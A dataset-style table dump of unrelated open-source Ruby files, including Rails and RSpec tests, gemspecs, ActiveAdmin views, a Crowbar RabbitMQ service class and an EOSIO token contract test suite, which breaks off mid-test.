hexsha
stringlengths 40
40
| size
int64 2
1.01M
| content
stringlengths 2
1.01M
| avg_line_length
float64 1.5
100
| max_line_length
int64 2
1k
| alphanum_fraction
float64 0.25
1
|
---|---|---|---|---|---|
91e3af98277e40f5a3836590387f17ed73024747 | 823 | require 'test_helper'
class MicropostsControllerTest < ActionDispatch::IntegrationTest
def setup
@micropost = microposts(:orange)
end
test "should redirect create when not logged in" do
assert_no_difference 'Micropost.count' do
post microposts_path, params: { micropost: { content: "Lorem ipsum" } }
end
assert_redirected_to login_url
end
test "should redirect destroy when not logged in" do
assert_no_difference 'Micropost.count' do
delete micropost_path(@micropost)
end
assert_redirected_to login_url
end
test "should redirect destroy for wrong micropost" do
log_in_as(users(:bones))
micropost = microposts(:ants)
assert_no_difference 'Micropost.count' do
delete micropost_path(micropost)
end
assert_redirected_to root_url
end
end | 24.939394 | 77 | 0.735115 |
e9187f029a1184be99bf8f0f849d752b0b5f2816 | 1,679 | # frozen_string_literal: true
lib = ::File.expand_path('../lib', __FILE__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require 'proxy_pac_rb/version'
Gem::Specification.new do |spec|
spec.name = 'proxy_pac_rb'
spec.version = ProxyPacRb::VERSION
spec.authors = ['Dennis Günnewig']
spec.email = ['[email protected]']
spec.homepage = 'https://github.com/dg-vrnetze/proxy_pac_rb'
spec.summary = 'Compress, lint and parse proxy auto-config files from commandline, rack-compatible applications and custom ruby code.'
spec.description = <<-DESC
"proxy_pac_rb" is a gem to compress, lint and parse proxy auto-config files. It comes with a cli program, some rack middlewares and can be used from within ruby scripts as well. "proxy_pac_rb" uses a JavaScript runtime to evaulate a proxy auto-config file the same way a browser does to determine what proxy (if any at all) should a program use to connect to a server. You must install on of the supported JavaScript runtimes: therubyracer or therubyrhino
DESC
spec.license = 'MIT'
spec.files = `git ls-files -z`.split("\x0")
spec.executables = spec.files.grep(%r{^bin/}) { |f| ::File.basename(f) }
spec.test_files = spec.files.grep(%r{^(test|spec|features)/})
spec.require_paths = ['lib']
spec.add_runtime_dependency 'addressable', '~>2.3'
spec.add_runtime_dependency 'activesupport', '>=4.1', '<5.2'
spec.add_runtime_dependency 'uglifier', '>= 2.7.1'
spec.add_runtime_dependency 'excon', '~> 0.45.3'
spec.add_runtime_dependency 'contracts', '~> 0.9'
spec.add_runtime_dependency 'thor', '~> 0.19'
spec.required_ruby_version = '~> 2.3'
end
| 50.878788 | 455 | 0.711138 |
1800c0eaa466d9bddc8d6ec3eba29e6ebf572d95 | 414 | require 'spec_helper'
describe OboParser::Utilities::Viz do
let(:o) { parse_obo_file(
File.read(File.expand_path(File.join(File.dirname(__FILE__), '../../files/hao.obo')) )
) }
specify '#mock_coordinate_space' do
capture_stderr do
expect(OboParser::Utilities::Viz.mock_coordinate_space(o, size: 50, cutoff: 10)).to be_truthy
end
end
end
| 29.571429 | 113 | 0.620773 |
1c796c829c401ace2fb4bf2840f83441da9b93df | 4,194 | module ActiveAdmin
module Views
module Pages
class Base < Arbre::HTML::Document
def build(*args)
super
add_classes_to_body
build_active_admin_head
build_page
end
private
def add_classes_to_body
@body.add_class(params[:action])
@body.add_class(params[:controller].tr('/', '_'))
@body.add_class("active_admin")
@body.add_class("logged_in")
@body.add_class(active_admin_namespace.name.to_s + "_namespace")
end
def build_active_admin_head
within @head do
insert_tag Arbre::HTML::Title, [title, render_or_call_method_or_proc_on(self, active_admin_namespace.site_title)].compact.join(" | ")
active_admin_application.stylesheets.each do |style, options|
text_node stylesheet_link_tag(style, options).html_safe
end
active_admin_application.javascripts.each do |path|
text_node(javascript_include_tag(path))
end
if active_admin_namespace.favicon
text_node(favicon_link_tag(active_admin_namespace.favicon))
end
active_admin_namespace.meta_tags.each do |name, content|
text_node(tag(:meta, name: name, content: content))
end
text_node csrf_meta_tag
end
end
def build_page
within @body do
div id: "wrapper" do
build_unsupported_browser
build_header
build_title_bar
build_page_content
build_footer
end
end
end
def build_unsupported_browser
if active_admin_namespace.unsupported_browser_matcher =~ controller.request.user_agent
insert_tag view_factory.unsupported_browser
end
end
def build_header
insert_tag view_factory.header, active_admin_namespace, current_menu
end
def build_title_bar
insert_tag view_factory.title_bar, title, action_items_for_action
end
def build_page_content
build_flash_messages
div id: "active_admin_content", class: (skip_sidebar? ? "without_sidebar" : "with_sidebar") do
build_main_content_wrapper
build_sidebar unless skip_sidebar?
end
end
def build_flash_messages
div class: 'flashes' do
flash_messages.each do |type, message|
div message, class: "flash flash_#{type}"
end
end
end
def build_main_content_wrapper
div id: "main_content_wrapper" do
div id: "main_content" do
main_content
end
end
end
def main_content
I18n.t('active_admin.main_content', model: title).html_safe
end
def title
self.class.name
end
# Set's the page title for the layout to render
def set_page_title
set_ivar_on_view "@page_title", title
end
# Returns the sidebar sections to render for the current action
def sidebar_sections_for_action
if active_admin_config && active_admin_config.sidebar_sections?
active_admin_config.sidebar_sections_for(params[:action], self)
else
[]
end
end
def action_items_for_action
if active_admin_config && active_admin_config.action_items?
active_admin_config.action_items_for(params[:action], self)
else
[]
end
end
# Renders the sidebar
def build_sidebar
div id: "sidebar" do
sidebar_sections_for_action.collect do |section|
sidebar_section(section)
end
end
end
def skip_sidebar?
sidebar_sections_for_action.empty? || assigns[:skip_sidebar] == true
end
# Renders the content for the footer
def build_footer
insert_tag view_factory.footer
end
end
end
end
end
| 28.337838 | 145 | 0.593467 |
39847de572592ec398ceb30571ab9c283f371559 | 1,210 | # frozen_string_literal: true
require 'spec_helper'
RSpec.describe Mutations::Admin::Analytics::DevopsAdoption::Segments::Create do
include GraphqlHelpers
let_it_be(:admin) { create(:admin) }
let_it_be(:group) { create(:group, name: 'bbbb') }
let(:variables) { { namespace_id: group.to_gid.to_s } }
let(:mutation) do
graphql_mutation(:create_devops_adoption_segment, variables) do
<<-QL.strip_heredoc
clientMutationId
errors
segment {
id
namespace {
id
name
}
}
QL
end
end
def mutation_response
graphql_mutation_response(:create_devops_adoption_segment)
end
before do
stub_licensed_features(instance_level_devops_adoption: true)
end
it_behaves_like 'DevOps Adoption top level errors'
it 'creates the segment with the group' do
post_graphql_mutation(mutation, current_user: admin)
expect(mutation_response['errors']).to be_empty
segment = mutation_response['segment']
expect(segment['namespace']['name']).to eq('bbbb')
expect(::Analytics::DevopsAdoption::Segment.joins(:namespace).where(namespaces: { name: 'bbbb' }).count).to eq(1)
end
end
| 25.208333 | 117 | 0.682645 |
edb4e223d9aacb9ad3dbe2cce5094ca42553cded | 1,267 | # coding: utf-8
lib = File.expand_path('../lib', __FILE__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require 'sepa_king/version'
Gem::Specification.new do |s|
s.name = 'sepa_king'
s.version = SEPA::VERSION
s.authors = ['Georg Leciejewski', 'Georg Ledermann']
s.email = ['[email protected]', '[email protected]']
s.description = 'Implemention of pain.001.002.03 and pain.008.002.02 (ISO 20022)'
s.summary = 'Ruby gem for creating SEPA XML files'
s.homepage = 'http://github.com/salesking/sepa_king'
s.license = 'MIT'
s.files = `git ls-files`.split($/)
s.executables = s.files.grep(%r{^bin/}) { |f| File.basename(f) }
s.test_files = s.files.grep(%r{^(test|spec|features)/})
s.require_paths = ['lib']
s.required_ruby_version = '>= 1.9.3'
s.add_runtime_dependency 'activemodel'
s.add_runtime_dependency 'i18n'
s.add_runtime_dependency 'builder'
s.add_runtime_dependency 'iban-tools'
s.add_development_dependency 'bundler', '~> 1.3'
s.add_development_dependency 'rspec', '>=2.14'
s.add_development_dependency 'coveralls'
s.add_development_dependency 'simplecov'
s.add_development_dependency 'rake'
s.add_development_dependency 'nokogiri'
end
| 36.2 | 85 | 0.681926 |
1db82bfa5a4b3065a214c60b49cbacb493336aef | 181 | Spree::Admin::ProductsController.class_eval do
include SpreeSku::SkuGeneratorHelper
def new
@product = Spree::Product.new
@product.master.sku = generate_sku
end
end
| 18.1 | 46 | 0.745856 |
6aabea47b763fb5726a9a5f148274d2c8db9f3fe | 4,627 | #
# Copyright 2011-2013, Dell
# Copyright 2013-2014, SUSE LINUX Products GmbH
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
class RabbitmqService < PacemakerServiceObject
def initialize(thelogger)
super(thelogger)
@bc_name = "rabbitmq"
end
# Turn off multi proposal support till it really works and people ask for it.
def self.allow_multiple_proposals?
false
end
class << self
def role_constraints
{
"rabbitmq-server" => {
"unique" => false,
"count" => 1,
"exclude_platform" => {
"windows" => "/.*/"
},
"cluster" => true
}
}
end
end
def proposal_dependencies(role)
answer = []
answer
end
def create_proposal
@logger.debug("Rabbitmq create_proposal: entering")
base = super
@logger.debug("Rabbitmq create_proposal: done with base")
nodes = NodeObject.all
nodes.delete_if { |n| n.nil? }
nodes.delete_if { |n| n.admin? } if nodes.size > 1
controller = nodes.find { |n| n if n.intended_role == "controller" } || nodes.first
base["deployment"]["rabbitmq"]["elements"] = {
"rabbitmq-server" => [controller.name]
}
base["attributes"][@bc_name]["password"] = random_password
base["attributes"][@bc_name]["trove"]["password"] = random_password
@logger.debug("Rabbitmq create_proposal: exiting")
base
end
def apply_role_pre_chef_call(old_role, role, all_nodes)
@logger.debug("Rabbitmq apply_role_pre_chef_call: entering #{all_nodes.inspect}")
return if all_nodes.empty?
rabbitmq_elements, rabbitmq_nodes, rabbitmq_ha_enabled = role_expand_elements(role, "rabbitmq-server")
role.save if prepare_role_for_ha(role, ["rabbitmq", "ha", "enabled"], rabbitmq_ha_enabled)
net_svc = NetworkService.new @logger
# Allocate public IP if rabbitmq should listen on public interface
if role.default_attributes["rabbitmq"]["listen_public"]
rabbitmq_nodes.each do |n|
net_svc.allocate_ip "default", "public", "host", n
end
end
if rabbitmq_ha_enabled
unless rabbitmq_elements.length == 1 && PacemakerServiceObject.is_cluster?(rabbitmq_elements[0])
raise "Internal error: HA enabled, but element is not a cluster"
end
cluster = rabbitmq_elements[0]
rabbitmq_vhostname = "#{role.name.gsub("-config", "")}-#{PacemakerServiceObject.cluster_name(cluster)}.#{ChefObject.cloud_domain}".gsub("_", "-")
net_svc.allocate_virtual_ip "default", "admin", "host", rabbitmq_vhostname
if role.default_attributes["rabbitmq"]["listen_public"]
net_svc.allocate_virtual_ip "default", "public", "host", rabbitmq_vhostname
end
# rabbitmq, on start, needs to have the virtual hostname resolvable; so
# let's force a dns update now
ensure_dns_uptodate
end
@logger.debug("Rabbitmq apply_role_pre_chef_call: leaving")
end
def validate_proposal_after_save proposal
validate_one_for_role proposal, "rabbitmq-server"
attributes = proposal["attributes"][@bc_name]
# HA validation
servers = proposal["deployment"][@bc_name]["elements"]["rabbitmq-server"]
unless servers.nil? || servers.first.nil? || !is_cluster?(servers.first)
storage_mode = attributes["ha"]["storage"]["mode"]
validation_error("Unknown mode for HA storage: #{storage_mode}.") unless %w(shared drbd).include?(storage_mode)
if storage_mode == "shared"
validation_error("No device specified for shared storage.") if attributes["ha"]["storage"]["shared"]["device"].blank?
validation_error("No filesystem type specified for shared storage.") if attributes["ha"]["storage"]["shared"]["fstype"].blank?
elsif storage_mode == "drbd"
cluster = servers.first
role = available_clusters[cluster]
validation_error("DRBD is not enabled for cluster #{cluster_name(cluster)}.") unless role.default_attributes["pacemaker"]["drbd"]["enabled"]
validation_error("Invalid size for DRBD device.") if attributes["ha"]["storage"]["drbd"]["size"] <= 0
end
end
super
end
end
| 36.148438 | 151 | 0.685325 |
876ef6d930c633c7088f96e01f270ccb21c9bdbe | 144 | require 'mxx_ru/cpp'
MxxRu::Cpp::exe_target {
required_prj "so_5/prj.rb"
target "_unit.test.coop.user_resource"
cpp_source "main.cpp"
}
| 12 | 39 | 0.722222 |
08478748e593d324abde17019adfbc7bb5733952 | 3,454 | require_relative '../../spec_helper'
require_relative 'fixtures/classes'
require_relative 'shared/enumeratorized'
describe "Enumerable#each_slice" do
before :each do
@enum = EnumerableSpecs::Numerous.new(7,6,5,4,3,2,1)
@sliced = [[7,6,5],[4,3,2],[1]]
end
it "passes element groups to the block" do
acc = []
@enum.each_slice(3){|g| acc << g}.should be_nil
acc.should == @sliced
end
it "raises an ArgumentError if there is not a single parameter > 0" do
->{ @enum.each_slice(0){} }.should raise_error(ArgumentError)
->{ @enum.each_slice(-2){} }.should raise_error(ArgumentError)
->{ @enum.each_slice{} }.should raise_error(ArgumentError)
->{ @enum.each_slice(2,2){} }.should raise_error(ArgumentError)
->{ @enum.each_slice(0) }.should raise_error(ArgumentError)
->{ @enum.each_slice(-2) }.should raise_error(ArgumentError)
->{ @enum.each_slice }.should raise_error(ArgumentError)
->{ @enum.each_slice(2,2) }.should raise_error(ArgumentError)
end
it "tries to convert n to an Integer using #to_int" do
acc = []
@enum.each_slice(3.3){|g| acc << g}.should == nil
acc.should == @sliced
obj = mock('to_int')
obj.should_receive(:to_int).and_return(3)
@enum.each_slice(obj){|g| break g.length}.should == 3
end
it "works when n is >= full length" do
full = @enum.to_a
acc = []
@enum.each_slice(full.length){|g| acc << g}
acc.should == [full]
acc = []
@enum.each_slice(full.length+1){|g| acc << g}
acc.should == [full]
end
it "yields only as much as needed" do
cnt = EnumerableSpecs::EachCounter.new(1, 2, :stop, "I said stop!", :got_it)
cnt.each_slice(2) {|g| break 42 if g[0] == :stop }.should == 42
cnt.times_yielded.should == 4
end
it "returns an enumerator if no block" do
e = @enum.each_slice(3)
e.should be_an_instance_of(Enumerator)
e.to_a.should == @sliced
end
it "gathers whole arrays as elements when each yields multiple" do
multi = EnumerableSpecs::YieldsMulti.new
multi.each_slice(2).to_a.should == [[[1, 2], [3, 4, 5]], [[6, 7, 8, 9]]]
end
describe "when no block is given" do
it "returns an enumerator" do
e = @enum.each_slice(3)
e.should be_an_instance_of(Enumerator)
e.to_a.should == @sliced
end
# TODO: Need to investigate what 'Enumerable with size' means...
describe "Enumerable with size" do
describe "returned Enumerator" do
describe "size" do
xit "returns the ceil of Enumerable size divided by the argument value" do
enum = EnumerableSpecs::NumerousWithSize.new(1, 2, 3, 4, 5, 6, 7, 8, 9, 10)
enum.each_slice(10).size.should == 1
enum.each_slice(9).size.should == 2
enum.each_slice(3).size.should == 4
enum.each_slice(2).size.should == 5
enum.each_slice(1).size.should == 10
end
xit "returns 0 when the Enumerable is empty" do
enum = EnumerableSpecs::EmptyWithSize.new
enum.each_slice(10).size.should == 0
end
end
end
end
describe "Enumerable with no size" do
before :all do
@object = EnumerableSpecs::Numerous.new(1, 2, 3, 4)
@method = [:each_slice, 8]
end
# FIXME: something broken in our test runner
#it_should_behave_like :enumeratorized_with_unknown_size
end
end
end
| 33.211538 | 87 | 0.625651 |
1d3fe5baf41a160fecd6de2fcf3328bad929b058 | 1,008 | require_relative 'boot'
require 'rails/all'
# Require the gems listed in Gemfile, including any gems
# you've limited to :test, :development, or :production.
Bundler.require(*Rails.groups)
module ThankYou
class Application < Rails::Application
# Initialize configuration defaults for originally generated Rails version.
config.load_defaults 6.0
config.time_zone = 'Tokyo'
config.i18n.default_locale = :ja
config.generators do |g|
g.test_framework :rspec, view_specs: false, routing_specs: false
end
config.middleware.use Rack::Attack
config.filter_parameters += %i[password]
# Settings in config/environments/* take precedence over those specified here.
# Application configuration can go into files in config/initializers
# -- all .rb files in that directory are automatically loaded after loading
# the framework and any gems in your application.
config.i18n.enforce_available_locales = true
config.i18n.default_locale = :ja
end
end
| 31.5 | 82 | 0.74504 |
b936633c57c7ee3390aa635b78f2d74a2397261c | 326 | # frozen_string_literal: true
Kaminari.configure do |config|
# config.default_per_page = 25
# config.max_per_page = nil
# config.window = 4
# config.outer_window = 0
# config.left = 0
# config.right = 0
# config.page_method_name = :page
# config.param_name = :page
# config.params_on_first_page = false
end
| 23.285714 | 39 | 0.705521 |
1de7d32d813fe80de3242fdb8513bd801cd5bb72 | 1,598 | =begin
#Xero Payroll UK
#This is the Xero Payroll API for orgs in the UK region.
The version of the OpenAPI document: 2.6.0
Contact: [email protected]
Generated by: https://openapi-generator.tech
OpenAPI Generator version: 4.3.1
=end
require 'time'
require 'date'
module XeroRuby::PayrollUk
class StatutoryDeductionCategory
ADDITIONAL_STUDENT_LOAN = "AdditionalStudentLoan".freeze
CHILD_SUPPORT = "ChildSupport".freeze
COURT_FINES = "CourtFines".freeze
CREDITOR = "Creditor".freeze
FEDERAL_LEVY = "FederalLevy".freeze
INLAND_REVENUE_ARREARS = "InlandRevenueArrears".freeze
KIWI_SAVER = "KiwiSaver".freeze
MSD_REPAYMENTS = "MsdRepayments".freeze
NON_PRIORITY_ORDER = "NonPriorityOrder".freeze
PRIORITY_ORDER = "PriorityOrder".freeze
TABLE_BASED = "TableBased".freeze
STUDENT_LOAN = "StudentLoan".freeze
VOLUNTARY_STUDENT_LOAN = "VoluntaryStudentLoan".freeze
US_CHILD_SUPPORT = "USChildSupport".freeze
# Builds the enum from string
# @param [String] The enum value in the form of the string
# @return [String] The enum value
def self.build_from_hash(value)
new.build_from_hash(value)
end
# Builds the enum from string
# @param [String] The enum value in the form of the string
# @return [String] The enum value
def build_from_hash(value)
constantValues = StatutoryDeductionCategory.constants.select { |c| StatutoryDeductionCategory::const_get(c) == value }
raise "Invalid ENUM value #{value} for class #StatutoryDeductionCategory" if constantValues.empty?
value
end
end
end
| 31.96 | 124 | 0.737171 |
1c8330b83cc8bbe85c185968996ebfbcce60527f | 1,048 | require 'test_helper'
class UsersEditTest < ActionDispatch::IntegrationTest
def setup
@user = users(:michael)
end
test "unsuccessful edit" do
log_in_as(@user)
get edit_user_path(@user)
assert_template 'users/edit'
patch user_path(@user), params: { user: {
name: "", email: "foo@invalid",
password: "foo", password_confirmation: "bar"
}}
assert_template 'users/edit'
assert_select 'div.alert', text: "The form contains 4 errors."
end
test "successful edit with friendly forwarding" do
get edit_user_path(@user)
log_in_as(@user)
assert_redirected_to edit_user_url(@user)
assert_nil session[:forwarding_url]
patch user_path(@user), params: { user: {
name: "Foo Bar", email: "[email protected]",
password: "", password_confirmation: ""
}}
assert_not flash.empty?
assert_redirected_to @user
@user.reload
assert_equal @user.name, "Foo Bar"
assert_equal @user.email, "[email protected]"
# assert_template 'users/#{@user.id}'
end
end
| 27.578947 | 66 | 0.663168 |
f8f5d0e7781852b833ecf61719034be7787eca5e | 763 | # frozen_string_literal: true
RSpec.shared_context 'token' do
let(:value) { 'token' }
let(:scope) { 'https://example.com/.default' }
let(:expire) { Time.now + 10 }
let(:token) { MSIDP::AccessToken.new(value, expire, scope) }
let(:attributes) { { value: value, scope: scope, expire: expire } }
end
RSpec.shared_context 'client_creds' do
include_context 'token'
let(:client_creds) { instance_double(ClientCreds, get_token: token) }
before do
allow(ClientCreds).to receive(:new).and_return(client_creds)
end
end
RSpec.shared_examples 'returning a token twice' do
subject { -> { AccessTokenProxy.token(scope) } }
it {
expect(subject.call).to have_attributes(attributes)
expect(subject.call).to have_attributes(attributes)
}
end
| 29.346154 | 71 | 0.711664 |
4a097a79e8e2331a7856cdcc190c8718aaa14bf8 | 1,520 | require 'spec_helper'
describe '#geopos' do
let(:key) { 'cities' }
context 'with existing key' do
let(:san_francisco) { [-122.5076404, 37.757815, 'SF'] }
let(:los_angeles) { [-118.6919259, 34.0207305, 'LA'] }
before { @redises.geoadd(key, *san_francisco, *los_angeles) }
after { @redises.zrem(key, %w[SF LA]) }
context 'with existing points only' do
let(:expected_result) do
[
%w[-122.5076410174369812 37.75781598995183685],
%w[-118.69192510843276978 34.020729570911179]
]
end
it 'returns decoded coordinates pairs for each point' do
coords = @redises.geopos(key, %w[SF LA])
expect(coords).to be == expected_result
end
context 'with non-existing points only' do
it 'returns array filled with nils' do
coords = @redises.geopos(key, %w[FF FA])
expect(coords).to be == [nil, nil]
end
end
context 'with both existing and non-existing points' do
let(:expected_result) do
[%w[-122.5076410174369812 37.75781598995183685], nil]
end
it 'returns mixture of nil and coordinates pair' do
coords = @redises.geopos(key, %w[SF FA])
expect(coords).to be == expected_result
end
end
end
end
context 'with non-existing key' do
before { @redises.del(key) }
it 'returns empty array' do
coords = @redises.geopos(key, %w[SF LA])
expect(coords).to be == [nil, nil]
end
end
end
| 27.142857 | 65 | 0.601316 |
91f4926b84227db7e50bde3dfc4fc91c9a0f26c4 | 29,617 | require_relative '../../_test_helpers/CommonTestHelpers'
def configure_contracts_for_tests
run %(cleos system newaccount --stake-cpu "10.0000 EOS" --stake-net "10.0000 EOS" --transfer --buy-ram-kbytes 1024 eosio testuser1 #{CONTRACT_PUBLIC_KEY} #{CONTRACT_PUBLIC_KEY})
run %(cleos system newaccount --stake-cpu "10.0000 EOS" --stake-net "10.0000 EOS" --transfer --buy-ram-kbytes 1024 eosio testuser2 #{CONTRACT_PUBLIC_KEY} #{CONTRACT_PUBLIC_KEY})
run %(cleos system newaccount --stake-cpu "10.0000 EOS" --stake-net "10.0000 EOS" --transfer --buy-ram-kbytes 1024 eosio testuser3 #{CONTRACT_PUBLIC_KEY} #{CONTRACT_PUBLIC_KEY})
run %(cleos system newaccount --stake-cpu "10.0000 EOS" --stake-net "10.0000 EOS" --transfer --buy-ram-kbytes 1024 eosio otherdacacc #{CONTRACT_PUBLIC_KEY} #{CONTRACT_PUBLIC_KEY})
run %(cleos push action dacdirectory regdac '{"owner": "dacdirectory", "dac_name": "dacpropabp", "dac_symbol": "4,ABP", "title": "Dac Title", "refs": [[1,"some_ref"]], "accounts": [[2,"daccustodian"], [5,"dacescrow"], [7,"dacescrow"], [0, "dacauthority"], [4, "eosdactokens"], [1, "eosdacthedac"] ], "scopes": [] }' -p dacdirectory)
run %(cleos push action dacdirectory regdac '{"owner": "dacdirectory", "dac_name": "eosdac", "dac_symbol": "4,EOSDAC", "title": "EOSDAC BP", "refs": [[1,"some_ref"]], "accounts": [[2,"daccustodian"], [5,"dacescrow"], [7,"dacescrow"], [0, "dacauthority"], [4, "eosdactokens"], [1, "eosdacthedac"] ], "scopes": [] }' -p dacdirectory)
run %(cleos push action dacdirectory regdac '{"owner": "dacdirectory", "dac_name": "dacpropaby", "dac_symbol": "4,ABY", "title": "Dac Title", "refs": [[1,"some_ref"]], "accounts": [[2,"daccustodian"], [5,"dacescrow"], [7,"dacescrow"], [0, "dacauthority"], [4, "eosdactokens"], [1, "eosdacthedac"] ], "scopes": [] }' -p dacdirectory)
run %(cleos push action dacdirectory regdac '{"owner": "otherdacacc", "dac_name": "otherdac", "dac_symbol": "4,ABZ", "title": "Other Dac Title", "refs": [[1,"some_ref"]], "accounts": [[2,"daccustodian"], [5,"dacescrow"], [7,"dacescrow"], [0, "otherdacacc"], [4, "eosdactokens"], [1, "eosdacthedac"] ], "scopes": [] }' -p otherdacacc)
run %(cleos push action daccustodian updateconfige '{"newconfig": { "lockupasset": "10.0000 ABP", "maxvotes": 5, "periodlength": 604800 , "numelected": 12, "authaccount": "dacauthority", "tokenholder": "eosdacthedac", "serviceprovider": "dacocoiogmbh", "should_pay_via_service_provider": 1, "auththresh": 3, "initial_vote_quorum_percent": 15, "vote_quorum_percent": 10, "auth_threshold_high": 11, "auth_threshold_mid": 7, "auth_threshold_low": 3, "lockup_release_time_delay": 10, "requested_pay_max": "450.0000 EOS"}, "dac_id": "dacpropabp"}' -p dacauthority)
run %(cleos push action daccustodian updateconfige '{"newconfig": { "lockupasset": "10.0000 ABP", "maxvotes": 5, "periodlength": 604800 , "numelected": 12, "authaccount": "dacauthority", "tokenholder": "eosdacthedac", "serviceprovider": "dacocoiogmbh", "should_pay_via_service_provider": 1, "auththresh": 3, "initial_vote_quorum_percent": 15, "vote_quorum_percent": 10, "auth_threshold_high": 11, "auth_threshold_mid": 7, "auth_threshold_low": 3, "lockup_release_time_delay": 10, "requested_pay_max": "450.0000 EOS"}, "dac_id": "eosdac"}' -p dacauthority)
run %(cleos push action daccustodian updateconfige '{"newconfig": { "lockupasset": "10.0000 ABY", "maxvotes": 5, "periodlength": 604800 , "numelected": 12, "authaccount": "dacauthority", "tokenholder": "eosdacthedac", "serviceprovider": "dacocoiogmbh", "should_pay_via_service_provider": 1, "auththresh": 3, "initial_vote_quorum_percent": 15, "vote_quorum_percent": 10, "auth_threshold_high": 11, "auth_threshold_mid": 7, "auth_threshold_low": 3, "lockup_release_time_delay": 10, "requested_pay_max": "450.0000 EOS"}, "dac_id": "dacpropaby"}' -p dacauthority)
run %(cleos push action daccustodian updateconfige '{"newconfig": { "lockupasset": "10.0000 ABY", "maxvotes": 5, "periodlength": 604800 , "numelected": 12, "authaccount": "dacauthority", "tokenholder": "eosdacthedac", "serviceprovider": "dacocoiogmbh", "should_pay_via_service_provider": 1, "auththresh": 3, "initial_vote_quorum_percent": 15, "vote_quorum_percent": 10, "auth_threshold_high": 11, "auth_threshold_mid": 7, "auth_threshold_low": 3, "lockup_release_time_delay": 10, "requested_pay_max": "450.0000 EOS"}, "dac_id": "otherdac"}' -p otherdacacc)
run %(cleos set account permission daccustodian active '{"threshold": 1,"keys": [{"key": "#{CONTRACT_PUBLIC_KEY}","weight": 1}],"accounts": [{"permission":{"actor":"eosdactokens","permission":"eosio.code"},"weight":1}]}' owner -p daccustodian@owner)
end
describe "eosdactokens" do
before(:all) do
reset_chain
configure_wallet
seed_system_contracts
configure_dac_accounts_and_permissions
install_dac_contracts
configure_contracts_for_tests
end
after(:all) do
killchain
end
context "Create a new currency" do
it "without account auth should fail" do
result = wrap_command %(cleos push action eosdactokens create '{ "issuer": "eosdactokens", "maximum_supply": "10000.0000 ABY", "transfer_locked": false}')
expect(result.stderr).to include('Error 3040003')
end
# it "with mismatching auth should fail" do
# result = wrap_command %(cleos push action eosdactokens create '{ "issuer": "eosdactokens", "maximum_supply": "10000.0000 ABT", "transfer_locked": false}' -p eosio)
# expect(result.stderr).to include('Error 3090004')
# end
it "with matching issuer and account auth should succeed." do
result = wrap_command %(cleos push action eosdactokens create '{ "issuer": "eosdactokens", "maximum_supply": "10000.0000 ABY", "transfer_locked": false}' -p eosdactokens)
expect(result.stdout).to include('eosdactokens::create')
end
end
context "Locked Tokens - " do
context "Create with transfer_locked true" do
it "create new token should succeed" do
result = wrap_command %(cleos push action eosdactokens create '{ "issuer": "eosdactokens", "maximum_supply": "10000.0000 ABP", "transfer_locked": true}' -p eosdactokens)
expect(result.stdout).to include('eosdactokens::create')
end
context "Issue tokens with valid auth should succeed" do
it do
result = wrap_command %(cleos push action eosdactokens issue '{ "to": "eosdactokens", "quantity": "1000.0000 ABP", "memo": "Initial amount of tokens for you."}' -p eosdactokens)
expect(result.stdout).to include('eosdactokens::issue')
end
end
end
context "Transfer with valid issuer auth from locked token should succeed" do
it do
result = wrap_command %(cleos push action eosdactokens transfer '{ "from": "eosdactokens", "to": "eosio", "quantity": "500.0000 ABP", "memo": "my first transfer"}' --permission eosdactokens@active)
expect(result.stdout).to include('500.0000 ABP')
end
end
context "Transfer from locked token with non-issuer auth should fail" do
it do
result = wrap_command %(cleos push action eosdactokens transfer '{ "from": "tester3", "to": "eosdactokens", "quantity": "400.0000 ABP", "memo": "my second transfer"}' -p tester3)
expect(result.stderr).to include('Ensure that you have the related private keys inside your wallet and your wallet is unlocked.')
end
end
context "Unlock locked token with non-issuer auth should fail" do
it do
result = wrap_command %(cleos push action eosdactokens unlock '{ "unlock": "10000.0000 ABP"}' -p tester3)
expect(result.stderr).to include('Ensure that you have the related private keys inside your wallet and your wallet is unlocked')
end
end
context "Transfer from locked token with non-issuer auth should fail after failed unlock attempt" do
it do
result = wrap_command %(cleos push action eosdactokens transfer '{ "from": "eosio", "to": "eosdactokens", "quantity": "400.0000 ABP", "memo": "my second transfer"}' -p eosio)
expect(result.stderr).to include('Error 3090004')
end
end
context "Unlock locked token with issuer auth should succeed" do
it do
result = wrap_command %(cleos push action eosdactokens unlock '{ "unlock": "1.0 ABP"}' -p eosdactokens)
expect(result.stdout).to include('{"unlock":"1.0 ABP"}')
end
end
context "Transfer from unlocked token with non-issuer auth should succeed after successful unlock" do
it do
result = wrap_command %(cleos push action eosdactokens transfer '{ "from": "eosio", "to": "eosdactokens", "quantity": "400.0000 ABP", "memo": "my second transfer"}' -p eosio)
expect(result.stdout).to include('400.0000 ABP')
end
end
context "Read the stats after issuing currency should display supply, supply and issuer" do
it do
result = wrap_command %(cleos get currency stats eosdactokens ABP)
expect(JSON.parse(result.stdout)).to eq JSON.parse <<~JSON
{
"ABP": {
"supply": "1000.0000 ABP",
"max_supply": "10000.0000 ABP",
"issuer": "eosdactokens"
}
}
JSON
end
end
end
context "Issue new currency" do
it "without valid auth should fail" do
result = wrap_command %(cleos push action eosdactokens issue '{ "to": "eosdactokens", "quantity": "1000.0000 ABY", "memo": "Initial amount of tokens for you."}')
expect(result.stderr).to include('Transaction should have at least one required authority')
end
it "without owner auth should fail" do
result = wrap_command %(cleos push action eosdactokens issue '{ "to": "tester1", "quantity": "1000.0000 ABY", "memo": "Initial amount of tokens for you."} -p tester1')
expect(result.stderr).to include('Transaction should have at least one required authority')
end
it "with mismatching auth should fail" do
result = wrap_command %(cleos push action eosdactokens issue '{ "to": "eosdactokens", "quantity": "1000.0000 ABY", "memo": "Initial amount of tokens for you."}' -p eosio)
expect(result.stderr).to include('Error 3090004')
end
it "with valid auth should succeed" do
result = wrap_command %(cleos push action eosdactokens issue '{ "to": "eosdactokens", "quantity": "1000.0000 ABY", "memo": "Initial amount of tokens for you."}' -p eosdactokens)
expect(result.stdout).to include('eosdactokens::issue')
end
it "greater than max should fail" do
